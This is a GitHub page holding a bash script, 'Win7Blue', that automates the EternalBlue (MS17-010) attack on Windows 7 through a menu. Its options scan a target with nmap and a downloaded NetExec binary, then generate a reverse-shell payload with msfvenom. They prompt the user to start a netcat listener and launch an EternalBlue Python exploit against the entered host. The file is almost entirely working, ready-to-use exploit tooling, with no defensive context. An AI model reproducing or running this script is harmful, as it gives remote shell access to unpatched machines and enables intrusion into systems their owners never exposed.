-
Notifications
You must be signed in to change notification settings - Fork 19
/
Win7Blue
180 lines (170 loc) · 6.25 KB
/
Win7Blue
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
#!/bin/bash
readonly RED="\e[91m"
readonly GREEN="\e[92m"
readonly YELLOW="\e[93m"
readonly BLUE="\e[34m"
readonly BLUELIGHT="\e[94m"
readonly WHITE="\e[97m"
readonly END="\e[0m"
readonly SHELL="$"
readonly VAR1="1"
readonly VAR2="2"
readonly VAR3="3"
readonly VAR4="4"
readonly VAR5="5"
readonly VAR6="Exploit"
readonly VAR7="32 bits"
readonly VAR8="64 bits"
readonly VAR9="["
readonly VAR10="]"
readonly VAR11="+"
readonly VAR12="--"
readonly VAR13="Exit"
readonly VAR14="¿"
readonly VAR15="?"
readonly VAR16="RHOST"
readonly VAR17="LHOST"
readonly VAR18="LPORT"
readonly VAR19="Creating SHELLCODE with MSFVENOM..."
readonly VAR20="EternalBlue"
readonly VAR21="MS17-010"
readonly VAR22="i"
readonly VAR23="Scanner"
readonly VAR24="Vuln"
readonly VAR25="Arch"
readonly VAR26="Nmap"
readonly VAR27="NetExec"
readonly VAR28="Please start NETCAT listener:"
readonly VAR29="nc -lvnp"
readonly VAR30="Win7"
readonly VAR31="Launching Exploit"
readonly BOX1=" $WHITE$VAR9$BLUE$VAR1$WHITE$VAR10$END"
readonly BOX2=" $WHITE$VAR9$BLUE$VAR2$WHITE$VAR10$END"
readonly BOX3=" $WHITE$VAR9$BLUE$VAR3$WHITE$VAR10$END"
readonly BOX4=" $WHITE$VAR9$BLUE$VAR4$WHITE$VAR10$END"
readonly BOX5=" $WHITE$VAR9$BLUE$VAR5$WHITE$VAR10$END"
function banner(){
echo
echo -e "$BLUELIGHT┌═══════════════════════════════════┐$END"
echo -e "$BLUELIGHT║$BLUE ██╗ ██╗██╗███╗ ██╗███████╗ $BLUELIGHT║$END"
echo -e "$BLUELIGHT║$BLUE ██║ ██║██║████╗ ██║╚════██║ $BLUELIGHT║$END"
echo -e "$BLUELIGHT║$BLUE ██║ █╗ ██║██║██╔██╗ ██║ ██╔╝ $BLUELIGHT║$END"
echo -e "$BLUELIGHT║$BLUE ██║███╗██║██║██║╚██╗██║ ██╔╝ $BLUELIGHT║$END"
echo -e "$BLUELIGHT║$BLUE ╚███╔███╔╝██║██║ ╚████║ ██║ $BLUELIGHT║$END"
echo -e "$BLUELIGHT║$BLUE ╚══╝╚══╝ ╚═╝╚═╝ ╚═══╝ ╚═╝ $BLUELIGHT║$END"
echo -e "$BLUELIGHT║$BLUE ██████╗ ██╗ ██╗ ██╗███████╗ $BLUELIGHT║$END"
echo -e "$BLUELIGHT║$BLUE ██╔══██╗██║ ██║ ██║██╔════╝ $BLUELIGHT║$END"
echo -e "$BLUELIGHT║$BLUE ██████╔╝██║ ██║ ██║█████╗ $BLUELIGHT║$END"
echo -e "$BLUELIGHT║$BLUE ██╔══██╗██║ ██║ ██║██╔══╝ $BLUELIGHT║$END"
echo -e "$BLUELIGHT║$BLUE ██████╔╝███████╗╚██████╔╝███████╗ $BLUELIGHT║$END"
echo -e "$BLUELIGHT║$BLUE ╚═════╝ ╚══════╝ ╚═════╝ ╚══════╝ $BLUELIGHT║$END"
echo -e "$BLUELIGHT║$WHITE $VAR9$BLUE$VAR11$WHITE$VAR10 $GREEN$VAR20 $WHITE$VAR12 $GREEN$VAR21 $WHITE$VAR9$BLUE$VAR11$WHITE$VAR10 $BLUELIGHT║$END"
echo -e "$BLUELIGHT└═══════════════════════════════════┘$END"
}
function main(){
echo
echo -e "$BOX1 $GREEN$VAR23 $WHITE$VAR24 $WHITE$VAR9$YELLOW$VAR26$WHITE$VAR10$END"
echo -e "$BOX2 $GREEN$VAR23 $WHITE$VAR25 $WHITE$VAR9$YELLOW$VAR27$WHITE$VAR10$END"
echo -e "$BOX3 $GREEN$VAR6 $WHITE$VAR30 $WHITE$VAR9$YELLOW$VAR7$WHITE$VAR10$END"
echo -e "$BOX4 $GREEN$VAR6 $WHITE$VAR30 $WHITE$VAR9$YELLOW$VAR8$WHITE$VAR10$END"
echo -e "$BOX5 $RED$VAR13$END"
echo
}
function menu(){
read -p " $(echo -e $BLUE$SHELL $END)" opc
if [ $opc -eq 1 ]; then
echo
echo -ne "$WHITE$VAR14$BLUE$VAR16$WHITE$VAR15$END "
read rhost
echo
VULNOUT=$(nmap -p445 --script "smb-vuln-ms17-010" $rhost | grep -A100 "smb-vuln-ms17-010" | grep -v "Nmap done:")
echo -e "$BLUE$VULNOUT$END"
echo
exit 0
elif [ $opc -eq 2 ]; then
echo
echo -ne "$WHITE$VAR14$BLUE$VAR16$WHITE$VAR15$END "
read rhost
echo
rm ./nxc 2>/dev/null
wget --no-check-certificate -q "https://github.com/Pennyw0rth/NetExec/releases/download/v1.1.0/nxc"
chmod +x ./nxc
sleep 1
ARCHOUT=$(./nxc smb $rhost)
echo -e "$BLUE$ARCHOUT$END"
echo
exit 0
elif [ $opc -eq 3 ]; then
echo
echo -ne "$WHITE$VAR14$BLUE$VAR16$WHITE$VAR15$END "
read rhost
echo
echo -ne "$WHITE$VAR14$BLUE$VAR17$WHITE$VAR15$END "
read lhost
echo
echo -ne "$WHITE$VAR14$BLUE$VAR18$WHITE$VAR15$END "
read lport
echo
rm -rf sc_x86_msf.bin
rm -rf sc_x86.bin
echo -e "$WHITE$VAR9$YELLOW$VAR22$WHITE$VAR10 $BLUE$VAR19$END"
echo
sleep 2
msfvenom -p windows/shell_reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=$lhost LPORT=$lport 2>/dev/null
sleep 1
/usr/bin/cat sc_x86_kernel.bin sc_x86_msf.bin > sc_x86.bin
sleep 1
echo -e "$WHITE$VAR9$YELLOW$VAR22$WHITE$VAR10 $BLUE$VAR28 $GREEN$VAR29 $lport$END"
echo
sleep 1
read -p "press ENTER to continue..."
echo
echo -e "$WHITE$VAR9$GREEN$VAR11$WHITE$VAR10 $BLUE$VAR31$END"
echo
sleep 1
python3 ms17_010_eternalblue.py $rhost sc_x86.bin
exit 0
elif [ $opc -eq 4 ]; then
echo
echo -ne "$WHITE$VAR14$BLUE$VAR16$WHITE$VAR15$END "
read rhost
echo
echo -ne "$WHITE$VAR14$BLUE$VAR17$WHITE$VAR15$END "
read lhost
echo
echo -ne "$WHITE$VAR14$BLUE$VAR18$WHITE$VAR15$END "
read lport
echo
rm -rf sc_x64_msf.bin
rm -rf sc_x64.bin
echo -e "$WHITE$VAR9$YELLOW$VAR22$WHITE$VAR10 $BLUE$VAR19$END"
echo
sleep 2
msfvenom -p windows/x64/shell_reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=$lhost LPORT=$lport 2>/dev/null
sleep 1
/usr/bin/cat sc_x64_kernel.bin sc_x64_msf.bin > sc_x64.bin
sleep 1
echo -e "$WHITE$VAR9$YELLOW$VAR22$WHITE$VAR10 $BLUE$VAR28 $GREEN$VAR29 $lport$END"
echo
sleep 1
read -p "press ENTER to continue..."
echo
echo -e "$WHITE$VAR9$GREEN$VAR11$WHITE$VAR10 $BLUE$VAR31$END"
echo
sleep 1
python3 ms17_010_eternalblue.py $rhost sc_x64.bin
exit 0
elif [ $opc -eq 5 ]; then
echo
exit 0
else
:
fi
}
function start(){
clear
banner
main
menu
}
start